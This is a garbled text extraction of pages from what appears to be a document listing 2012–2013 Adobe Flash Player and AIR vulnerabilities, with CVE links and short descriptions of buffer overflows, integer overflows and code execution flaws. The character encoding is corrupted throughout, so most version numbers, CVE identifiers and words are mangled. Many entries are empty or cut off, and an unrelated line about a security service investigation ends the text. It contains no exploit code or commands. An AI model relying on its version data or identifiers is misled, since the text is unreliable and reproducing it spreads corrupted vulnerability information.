C)-201"-1"## htt(344&&&$cvedetails$com4cve4C)-201"-1"##4





:2'$%&+'&+,*0 :2'$%&+'&+,0 :2'$%&+'&+,B0 :2'$%&+'&+,A0 :2'$%&+'&+%0 :2'$%&+'&+$0 and :2'$%&+'&++.


15/29

C)-201"-1"#! htt(344&&&$cvedetails$com4cve4C)-201"-1"#!4





:2'$%&+'&+,,0 :2'$%&+'&+,0 :2'$%&+'&+,B0 :2'$%&+'&+,A0 :2'$%&+'&+%0 :2'$%&+'&+$0 and :2'$%&+'&++.

C)-201"-0#!0 htt(344&&&$cvedetails$com4cve4C)-201"-0#!04

Ese'a!ter'!ree vulnera"ility in =do"e Flash 1layer "e!ore &%.+.&B+.,B and &&.8 "e!ore &&.,.,%$.&B% on

5indo-s and 9ac S 0 "e!ore &%.+.&B+.,B and &&.8 "e!ore &&.$.$%$.$* on Jinu80 "e!ore

&&.&.&&&.CC on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.CB on =ndroid C.8H =do"e =IR "e!ore+.,.%.,%A%H =do"e =IR SDK "e!ore +.,.%.,%A%H and =do"e =IR SDK L :ompiler "e!ore +.,.%.,%A%

allo-s attackers to e8ecute ar"itrary code via unspeci!ied vectors.

C)-201"-0#+5 htt(344&&&$cvedetails$com4cve4C)-201"-0#+54


5indo-s0 "e!ore &%.+.&B+.,& and &&.8 "e!ore &&.,.,%$.&, on 9ac S 0 "e!ore &%.+.&B+.,& and &&.8

"e!ore &&.$.$%$.$% on Jinu80 "e!ore &&.&.&&&.C+ on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.C on=ndroid C.8H =do"e =IR "e!ore +.,.%.*AH and =do"e =IR SDK "e!ore +.,.%.*AA allo-s attackers to

e8ecute ar"itrary code via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'%,CC and :2'

$%&+'&+C.

C)-201"-0#+ htt(344&&&$cvedetails$com4cve4C)-201"-0#+4

Enspeci!ied vulnera"ility in the 28ternalInter!ace =ctionScript !unctionality in =do"e Flash 1layer

"e!ore &%.+.&B+., and &&.8 "e!ore &&.,.,%$.&& on 5indo-s and 9ac S 0 and "e!ore &%.+.&B+.,and &&.8 "e!ore &&.$.$%$.$+ on Jinu80 allo-s remote attackers to e8ecute ar"itrary code via cra!ted

S5F content0 as e8ploited in the -ild in Fe"ruary $%&+.

C)-201"-0#+/ htt(344&&&$cvedetails$com4cve4C)-201"-0#+/4

=do"e Flash 1layer "e!ore &%.+.&B+.,+ and &&.8 "e!ore &&.,.,%$.&,B on 5indo-s0 "e!ore &%.+.&B+.,&

and &&.8 "e!ore &&.,.,%$.&, on 9ac S 0 "e!ore &%.+.&B+.,& and &&.8 "e!ore &&.$.$%$.$% onJinu80 "e!ore &&.&.&&&.C+ on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.C on =ndroid C.8H =do"e =IR

"e!ore +.,.%.*AH and =do"e =IR SDK "e!ore +.,.%.*AA allo- attackers to e8ecute ar"itrary code or

cause a denial o! service memory corruptionG via unspeci!ied vectors0 a di!!erent vulnera"ility than:2'$%&+'%,+B.

C)-201"-0#+# htt(344&&&$cvedetails$com4cve4C)-201"-0#+#4

Inteer over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.,B and &&.8 "e!ore &&.,.,%$.&B% on 5indo-sand 9ac S 0 "e!ore &%.+.&B+.,B and &&.8 "e!ore &&.$.$%$.$* on Jinu80 "e!ore &&.&.&&&.CC on

=ndroid $.8 and +.80 and "e!ore &&.&.&&*.CB on =ndroid C.8H =do"e =IR "e!ore +.,.%.,%A%H =do"e

=IR SDK "e!ore +.,.%.,%A%H and =do"e =IR SDK L :ompiler "e!ore +.,.%.,%A% allo-s attackers toe8ecute ar"itrary code via unspeci!ied vectors.


16/29

C)-201"-0#+! htt(344&&&$cvedetails$com4cve4C)-201"-0#+!4




ar"itrary code via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'%,C$0 :2'$%&+'&+,*0

:2'$%&+'&+,,0 :2'$%&+'&+,0 :2'$%&+'&+,B0 :2'$%&+'&+,A0 :2'$%&+'&+%0 :2'$%&+'&+$0 and :2'$%&+'&++.

C)-201"-0#++ htt(344&&&$cvedetails$com4cve4C)-201"-0#++4


5indo-s0 "e!ore &%.+.&B+.,& and &&.8 "e!ore &&.,.,%$.&, on 9ac S 0 "e!ore &%.+.&B+.,& and &&.8

"e!ore &&.$.$%$.$% on Jinu80 "e!ore &&.&.&&&.C+ on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.C on=ndroid C.8H =do"e =IR "e!ore +.,.%.*AH and =do"e =IR SDK "e!ore +.,.%.*AA allo-s attackers to

e8ecute ar"itrary code via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'%,CA and :2'

$%&+'&+C.

C)-201"-0#+" htt(344&&&$cvedetails$com4cve4C)-201"-0#+"4

The Fire!o8 sand"o8 in =do"e Flash 1layer "e!ore &%.+.&B+., and &&.8 "e!ore &&.,.,%$.&& on

5indo-s and 9ac S 0 and "e!ore &%.+.&B+., and &&.8 "e!ore &&.$.$%$.$+ on Jinu80 does notproperly restrict privilees0 -hich makes it easier !or remote attackers to e8ecute ar"itrary code via

cra!ted S5F content0 as e8ploited in the -ild in Fe"ruary $%&+.

C)-201"-0#+2 htt(344&&&$cvedetails$com4cve4C)-201"-0#+24




ar"itrary code via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'%,C*0 :2'$%&+'&+,*0

:2'$%&+'&+,,0 :2'$%&+'&+,0 :2'$%&+'&+,B0 :2'$%&+'&+,A0 :2'$%&+'&+%0 :2'$%&+'&+$0 and :2'$%&+'&++.

C)-201"-0#"5 htt(344&&&$cvedetails$com4cve4C)-201"-0#"54

Inteer over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.,+ and &&.8 "e!ore &&.,.,%$.&,B on 5indo-s0



ar"itrary code via unspeci!ied vectors.

C)-201"-0#" htt(344&&&$cvedetails$com4cve4C)-201"-0#"4


and &&.8 "e!ore &&.,.,%$.&, on 9ac S 0 "e!ore &%.+.&B+.,& and &&.8 "e!ore &&.$.$%$.$% on

Jinu80 "e!ore &&.&.&&&.C+ on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.C on =ndroid C.8H =do"e =IR"e!ore +.,.%.*AH and =do"e =IR SDK "e!ore +.,.%.*AA allo- attackers to e8ecute ar"itrary code or

cause a denial o! service memory corruptionG via unspeci!ied vectors0 a di!!erent vulnera"ility than

:2'$%&+'%,C.


17/29

C)-201"-0#"/ htt(344&&&$cvedetails$com4cve4C)-201"-0#"/4


and &&.8 "e!ore &&.,.,%$.&, on 9ac S 0 "e!ore &%.+.&B+.,& and &&.8 "e!ore &&.$.$%$.$% on

Jinu80 "e!ore &&.&.&&&.C+ on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.C on =ndroid C.8H =do"e =IR"e!ore +.,.%.*AH and =do"e =IR SDK "e!ore +.,.%.*AA allo- attackers to o"tain sensitive in!ormation

via unspeci!ied vectors.

C)-201"-0#"+ htt(344&&&$cvedetails$com4cve4C)-201"-0#"+4

=do"e Flash 1layer "e!ore &%.+.&B+.*& and &&.8 "e!ore &&.*.*%$.&CA on 5indo-s and 9ac S 0

"e!ore &%.+.&B+.*& and &&.8 "e!ore &&.$.$%$.$,$ on Jinu80 "e!ore &&.&.&&&.+$ on =ndroid $.8 and +.80and "e!ore &&.&.&&*.+ on =ndroid C.8 allo-s remote attackers to e8ecute ar"itrary code or cause a

denial o! service memory corruptionG via cra!ted S5F content0 as e8ploited in the -ild in Fe"ruary

$%&+.

C)-201"-0#"" htt(344&&&$cvedetails$com4cve4C)-201"-0#""4

(u!!er over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.*& and &&.8 "e!ore &&.*.*%$.&CA on 5indo-s

and 9ac S 0 "e!ore &%.+.&B+.*& and &&.8 "e!ore &&.$.$%$.$,$ on Jinu80 "e!ore &&.&.&&&.+$ on=ndroid $.8 and +.80 and "e!ore &&.&.&&*.+ on =ndroid C.8 allo-s remote attackers to e8ecute

ar"itrary code via cra!ted S5F content0 as e8ploited in the -ild in Fe"ruary $%&+.

C)-201"-0#"0 htt(344&&&$cvedetails$com4cve4C)-201"-0#"04

(u!!er over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.*% and &&.8 "e!ore &&.*.*%$.&C, on 5indo-s

and 9ac S 0 "e!ore &%.+.&B+.*% and &&.8 "e!ore &&.$.$%$.$,& on Jinu80 "e!ore &&.&.&&&.+& on=ndroid $.8 and +.80 and "e!ore &&.&.&&*.+, on =ndroid C.8H =do"e =IR "e!ore +.*.%.&%,%H and =do"e

=IR SDK "e!ore +.*.%.&%,% allo-s attackers to e8ecute ar"itrary code via unspeci!ied vectors.

C)-201"-0!0+ htt(344&&&$cvedetails$com4cve4C)-201"-0!0+4

(u!!er over!lo- in the "roker service in =do"e Flash 1layer "e!ore &%.+.&B+., and &&.8 "e!ore

&&.,.,%$.&& on 5indo-s and 9ac S 0 and "e!ore &%.+.&B+., and &&.8 "e!ore &&.$.$%$.$+ on

Jinu80 allo-s attackers to e8ecute ar"itrary code via unspeci!ied vectors.

C)-2012-!#/ htt(344&&&$cvedetails$com4cve4C)-2012-!#/4

=do"e Flash 1layer "e!ore &%.+.&B+.CB and &&.8 "e!ore &&.*.*%$.&+* on 5indo-s0 "e!ore &%.+.&B+.CBand &&.8 "e!ore &&.*.*%$.&+, on 9ac S 0 "e!ore &%.+.&B+.CB and &&.8 "e!ore &&.$.$%$.$*B on

Jinu80 "e!ore &&.&.&&&.$A on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.+C on =ndroid C.8H =do"e =IR

"e!ore +.*.%.BB% on 5indo-s and "e!ore +.*.%.BA% on 9ac S H and =do"e =IR SDK "e!ore+.*.%.BB% on 5indo-s and "e!ore +.*.%.BA% on 9ac S allo- attackers to e8ecute ar"itrary code or

cause a denial o! service memory corruptionG via unspeci!ied vectors.

C)-2012-!#// htt(344&&&$cvedetails$com4cve4C)-2012-!#//4

Inteer over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.CB and &&.8 "e!ore &&.*.*%$.&+* on 5indo-s0

"e!ore &%.+.&B+.CB and &&.8 "e!ore &&.*.*%$.&+, on 9ac S 0 "e!ore &%.+.&B+.CB and &&.8 "e!ore

&&.$.$%$.$*B on Jinu80 "e!ore &&.&.&&&.$A on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.+C on =ndroidC.8H =do"e =IR "e!ore +.*.%.BB% on 5indo-s and "e!ore +.*.%.BA% on 9ac S H and =do"e =IR

SDK "e!ore +.*.%.BB% on 5indo-s and "e!ore +.*.%.BA% on 9ac S allo-s attackers to e8ecute

http://www.cvedetails.com/cve/CVE-2013-0637/http://www.cvedetails.com/cve/CVE-2013-0634/http://www.cvedetails.com/cve/CVE-2013-0633/http://www.cvedetails.com/cve/CVE-2013-0630/http://www.cvedetails.com/cve/CVE-2013-0504/http://www.cvedetails.com/cve/CVE-2012-5678/http://www.cvedetails.com/cve/CVE-2012-5677/http://www.cvedetails.com/cve/CVE-2013-0637/http://www.cvedetails.com/cve/CVE-2013-0634/http://www.cvedetails.com/cve/CVE-2013-0633/http://www.cvedetails.com/cve/CVE-2013-0630/http://www.cvedetails.com/cve/CVE-2013-0504/http://www.cvedetails.com/cve/CVE-2012-5678/http://www.cvedetails.com/cve/CVE-2012-5677/


18/29

C)-2012-!#/# htt(344&&&$cvedetails$com4cve4C)-2012-!#/#4

(u!!er over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.CB and &&.8 "e!ore &&.*.*%$.&+* on 5indo-s0

"e!ore &%.+.&B+.CB and &&.8 "e!ore &&.*.*%$.&+, on 9ac S 0 "e!ore &%.+.&B+.CB and &&.8 "e!ore

&&.$.$%$.$*B on Jinu80 "e!ore &&.&.&&&.$A on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.+C on =ndroidC.8H =do"e =IR "e!ore +.*.%.BB% on 5indo-s and "e!ore +.*.%.BA% on 9ac S H and =do"e =IR

SDK "e!ore +.*.%.BB% on 5indo-s and "e!ore +.*.%.BA% on 9ac S allo-s attackers to e8ecute


C)-2012-!#/" htt(344&&&$cvedetails$com4cve4C)-2012-!#/"4

Enspeci!ied vulnera"ility in =do"e Flash 1layer "e!ore &%.+.&B+.$A and &&.8 "e!ore &&.C.C%$.$B on5indo-s and 9ac S 0 "e!ore &%.+.&B+.$A and &&.8 "e!ore &&.$.$%$.$C+ on Jinu80 "e!ore

&&.&.&&&.&A on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.$% on =ndroid C.8H =do"e =IR "e!ore

+.C.%.$&%H and =do"e =IR SDK "e!ore +.C.%.$&% has unkno-n impact and attack vectors.

C)-2012-!2/ htt(344&&&$cvedetails$com4cve4C)-2012-!2/4

(u!!er over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.$A and &&.8 "e!ore &&.C.C%$.$B on 5indo-s

and 9ac S 0 "e!ore &%.+.&B+.$A and &&.8 "e!ore &&.$.$%$.$C+ on Jinu80 "e!ore &&.&.&&&.&A on=ndroid $.8 and +.80 and "e!ore &&.&.&&*.$% on =ndroid C.8H =do"e =IR "e!ore +.C.%.$&%H and =do"e

=IR SDK "e!ore +.C.%.$&% allo-s attackers to e8ecute ar"itrary code via unspeci!ied vectors0 a

di!!erent vulnera"ility than other Flash 1layer "u!!er over!lo- :2s listed in =1S(&$'$$.

C)-2012-!2# htt(344&&&$cvedetails$com4cve4C)-2012-!2#4

(u!!er over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.$A and &&.8 "e!ore &&.C.C%$.$B on 5indo-sand 9ac S 0 "e!ore &%.+.&B+.$A and &&.8 "e!ore &&.$.$%$.$C+ on Jinu80 "e!ore &&.&.&&&.&A on

=ndroid $.8 and +.80 and "e!ore &&.&.&&*.$% on =ndroid C.8H =do"e =IR "e!ore +.C.%.$&%H and =do"e



C)-2012-!2! htt(344&&&$cvedetails$com4cve4C)-2012-!2!4



=IR SDK "e!ore +.C.%.$&% allo-s attackers to e8ecute ar"itrary code via unspeci!ied vectors0 adi!!erent vulnera"ility than other Flash 1layer "u!!er over!lo- :2s listed in =1S(&$'$$.

C)-2012-!20 htt(344&&&$cvedetails$com4cve4C)-2012-!204

(u!!er over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.C+ and &&.8 "e!ore &&.*.*%$.&&% on 5indo-s

and 9ac S 0 "e!ore &%.+.&B+.C+ and &&.8 "e!ore &&.$.$%$.$*& on Jinu80 "e!ore &&.&.&&&.$C on

=ndroid $.8 and +.80 and "e!ore &&.&.&&*.$ on =ndroid C.8H =do"e =IR "e!ore +.*.%.,%%H and =do"e

=IR SDK "e!ore +.*.%.,%% allo-s attackers to e8ecute ar"itrary code via unspeci!ied vectors0 adi!!erent vulnera"ility than :2'$%&$'*$C0 :2'$%&$'*$*0 :2'$%&$'*$,0 and :2'$%&$'*$.

C)-2012-!2/5 htt(344&&&$cvedetails$com4cve4C)-2012-!2/54

=do"e Flash 1layer "e!ore &%.+.&B+.C+ and &&.8 "e!ore &&.*.*%$.&&% on 5indo-s and 9ac S 0

"e!ore &%.+.&B+.C+ and &&.8 "e!ore &&.$.$%$.$*& on Jinu80 "e!ore &&.&.&&&.$C on =ndroid $.8 and +.80

and "e!ore &&.&.&&*.$ on =ndroid C.8H =do"e =IR "e!ore +.*.%.,%%H and =do"e =IR SDK "e!ore+.*.%.,%% allo- attackers to e8ecute ar"itrary code or cause a denial o! service memory corruptionG via

unspeci!ied vectors.


19/29

C)-2012-!2/ htt(344&&&$cvedetails$com4cve4C)-2012-!2/4

=do"e Flash 1layer "e!ore &%.+.&B+.C+ and &&.8 "e!ore &&.*.*%$.&&% on 5indo-s and 9ac S 0

"e!ore &%.+.&B+.C+ and &&.8 "e!ore &&.$.$%$.$*& on Jinu80 "e!ore &&.&.&&&.$C on =ndroid $.8 and +.80

and "e!ore &&.&.&&*.$ on =ndroid C.8H =do"e =IR "e!ore +.*.%.,%%H and =do"e =IR SDK "e!ore+.*.%.,%% allo- attackers to "ypass intended access restrictions and e8ecute ar"itrary code via

unspeci!ied vectors.

C)-2012-!2// htt(344&&&$cvedetails$com4cve4C)-2012-!2//4


and 9ac S 0 "e!ore &%.+.&B+.C+ and &&.8 "e!ore &&.$.$%$.$*& on Jinu80 "e!ore &&.&.&&&.$C on=ndroid $.8 and +.80 and "e!ore &&.&.&&*.$ on =ndroid C.8H =do"e =IR "e!ore +.*.%.,%%H and =do"e

=IR SDK "e!ore +.*.%.,%% allo-s attackers to e8ecute ar"itrary code via unspeci!ied vectors0 a

di!!erent vulnera"ility than :2'$%&$'*$C0 :2'$%&$'*$*0 :2'$%&$'*$,0 and :2'$%&$'*$B%.

C)-2012-!2/# htt(344&&&$cvedetails$com4cve4C)-2012-!2/#4


and 9ac S 0 "e!ore &%.+.&B+.C+ and &&.8 "e!ore &&.$.$%$.$*& on Jinu80 "e!ore &&.&.&&&.$C on=ndroid $.8 and +.80 and "e!ore &&.&.&&*.$ on =ndroid C.8H =do"e =IR "e!ore +.*.%.,%%H and =do"e


di!!erent vulnera"ility than :2'$%&$'*$C0 :2'$%&$'*$*0 :2'$%&$'*$0 and :2'$%&$'*$B%.

C)-2012-!2/! htt(344&&&$cvedetails$com4cve4C)-2012-!2/!4

(u!!er over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.C+ and &&.8 "e!ore &&.*.*%$.&&% on 5indo-sand 9ac S 0 "e!ore &%.+.&B+.C+ and &&.8 "e!ore &&.$.$%$.$*& on Jinu80 "e!ore &&.&.&&&.$C on



di!!erent vulnera"ility than :2'$%&$'*$C0 :2'$%&$'*$,0 :2'$%&$'*$0 and :2'$%&$'*$B%.

C)-2012-!2/+ htt(344&&&$cvedetails$com4cve4C)-2012-!2/+4

(u!!er over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.C+ and &&.8 "e!ore &&.*.*%$.&&% on 5indo-sand 9ac S 0 "e!ore &%.+.&B+.C+ and &&.8 "e!ore &&.$.$%$.$*& on Jinu80 "e!ore &&.&.&&&.$C on


=IR SDK "e!ore +.*.%.,%% allo-s attackers to e8ecute ar"itrary code via unspeci!ied vectors0 adi!!erent vulnera"ility than :2'$%&$'*$*0 :2'$%&$'*$,0 :2'$%&$'*$0 and :2'$%&$'*$B%.


=do"e Flash 1layer "e!ore &%.+.&B+.$A and &&.8 "e!ore &&.C.C%$.$B on 5indo-s and 9ac S 0

"e!ore &%.+.&B+.$A and &&.8 "e!ore &&.$.$%$.$C+ on Jinu80 "e!ore &&.&.&&&.&A on =ndroid $.8 and +.80

and "e!ore &&.&.&&*.$% on =ndroid C.8H =do"e =IR "e!ore +.C.%.$&%H and =do"e =IR SDK "e!ore

+.C.%.$&% allo- attackers to e8ecute ar"itrary code or cause a denial o! service memory corruptionGvia unspeci!ied vectors0 a di!!erent vulnera"ility than other Flash 1layer memory corruption :2s

listed in =1S(&$'$$.


20/29




and "e!ore &&.&.&&*.$% on =ndroid C.8H =do"e =IR "e!ore +.C.%.$&%H and =do"e =IR SDK "e!ore+.C.%.$&% allo- attackers to e8ecute ar"itrary code or cause a denial o! service memory corruptionG

via unspeci!ied vectors0 a di!!erent vulnera"ility than other Flash 1layer memory corruption :2s



=do"e Flash 1layer "e!ore &%.+.&B+.$A and &&.8 "e!ore &&.C.C%$.$B on 5indo-s and 9ac S 0"e!ore &%.+.&B+.$A and &&.8 "e!ore &&.$.$%$.$C+ on Jinu80 "e!ore &&.&.&&&.&A on =ndroid $.8 and +.80




C)-2012-!2#5 htt(344&&&$cvedetails$com4cve4C)-2012-!2#54






C)-2012-!2# htt(344&&&$cvedetails$com4cve4C)-2012-!2#4


"e!ore &%.+.&B+.$A and &&.8 "e!ore &&.$.$%$.$C+ on Jinu80 "e!ore &&.&.&&&.&A on =ndroid $.8 and +.80and "e!ore &&.&.&&*.$% on =ndroid C.8H =do"e =IR "e!ore +.C.%.$&%H and =do"e =IR SDK "e!ore

+.C.%.$&% allo- attackers to e8ecute ar"itrary code or cause a denial o! service memory corruptionG

via unspeci!ied vectors0 a di!!erent vulnera"ility than other Flash 1layer memory corruption :2slisted in =1S(&$'$$.

C)-2012-!2#/ htt(344&&&$cvedetails$com4cve4C)-2012-!2#/4






C)-2012-!2## htt(344&&&$cvedetails$com4cve4C)-2012-!2##4






21/29

C)-2012-!2#! htt(344&&&$cvedetails$com4cve4C)-2012-!2#!4


and 9ac S 0 "e!ore &%.+.&B+.$A and &&.8 "e!ore &&.$.$%$.$C+ on Jinu80 "e!ore &&.&.&&&.&A on

=ndroid $.8 and +.80 and "e!ore &&.&.&&*.$% on =ndroid C.8H =do"e =IR "e!ore +.C.%.$&%H and =do"e=IR SDK "e!ore +.C.%.$&% allo-s attackers to e8ecute ar"itrary code via unspeci!ied vectors0 a


C)-2012-!2#+ htt(344&&&$cvedetails$com4cve4C)-2012-!2#+4





C)-2012-!2#" htt(344&&&$cvedetails$com4cve4C)-2012-!2#"4






















22/29

C)-2012-!2!5 htt(344&&&$cvedetails$com4cve4C)-2012-!2!54





C)-2012-!2! htt(344&&&$cvedetails$com4cve4C)-2012-!2!4





C)-2012-!2!/ htt(344&&&$cvedetails$com4cve4C)-2012-!2!/4




C)-2012-!2!# htt(344&&&$cvedetails$com4cve4C)-2012-!2!#4






C)-2012-!2!! htt(344&&&$cvedetails$com4cve4C)-2012-!2!!4





C)-2012-!2!+ htt(344&&&$cvedetails$com4cve4C)-2012-!2!+4






23/29

C)-2012-!2!" htt(344&&&$cvedetails$com4cve4C)-2012-!2!"4



















C)-2012-!2+5 htt(344&&&$cvedetails$com4cve4C)-2012-!2+54





C)-2012-!2+ htt(344&&&$cvedetails$com4cve4C)-2012-!2+4





C)-2012-!0!+ htt(344&&&$cvedetails$com4cve4C)-2012-!0!+4

Inteer over!lo- in the copyRa-DataTo method in the 9atri8+D class in =do"e Flash 1layer "e!ore

&&.C.C%$.$,* allo-s remote attackers to e8ecute ar"itrary code via mal!ormed aruments.


24/29

C)-2012-+1/1 htt(344&&&$cvedetails$com4cve4C)-2012-+1/14

=do"e Flash 1layer "e!ore &%.+.&B+.$+ and &&.8 "e!ore &&.C.C%$.$,* on 5indo-s and 9ac S 0

"e!ore &%.+.&B+.$+ and &&.8 "e!ore &&.$.$%$.$+B on Jinu80 "e!ore &&.&.&&&.&, on =ndroid $.8 and +.80

and "e!ore &&.&.&&*.& on =ndroid C.8H =do"e =IR "e!ore +.C.%.$*C%H and =do"e =IR SDK "e!ore+.C.%.$*C% allo- attackers to cause a denial o! service application crashG "y leverain a loic error

durin handlin o! Fire!o8 dialos.

C)-2012-+1# htt(344&&&$cvedetails$com4cve4C)-2012-+1#4

=do"e Flash 1layer "e!ore &%.+.&B+.$+ and &&.8 "e!ore &&.C.C%$.$,* on 5indo-s and 9ac S 0

"e!ore &%.+.&B+.$+ and &&.8 "e!ore &&.$.$%$.$+B on Jinu80 "e!ore &&.&.&&&.&, on =ndroid $.8 and +.80and "e!ore &&.&.&&*.& on =ndroid C.8H =do"e =IR "e!ore +.C.%.$*C%H and =do"e =IR SDK "e!ore

+.C.%.$*C% allo- remote attackers to read content !rom a di!!erent domain via a cra!ted -e" site.

C)-2012-+1#/ htt(344&&&$cvedetails$com4cve4C)-2012-+1#/4

Inteer over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.$+ and &&.8 "e!ore &&.C.C%$.$,* on 5indo-s

and 9ac S 0 "e!ore &%.+.&B+.$+ and &&.8 "e!ore &&.$.$%$.$+B on Jinu80 "e!ore &&.&.&&&.&, on

=ndroid $.8 and +.80 and "e!ore &&.&.&&*.& on =ndroid C.8H =do"e =IR "e!ore +.C.%.$*C%H and =do"e=IR SDK "e!ore +.C.%.$*C% allo-s attackers to e8ecute ar"itrary code via unspeci!ied vectors.

C)-2012-+1#! htt(344&&&$cvedetails$com4c

comments on the security service investigation of remote control possibilities regarding seizure...

Documents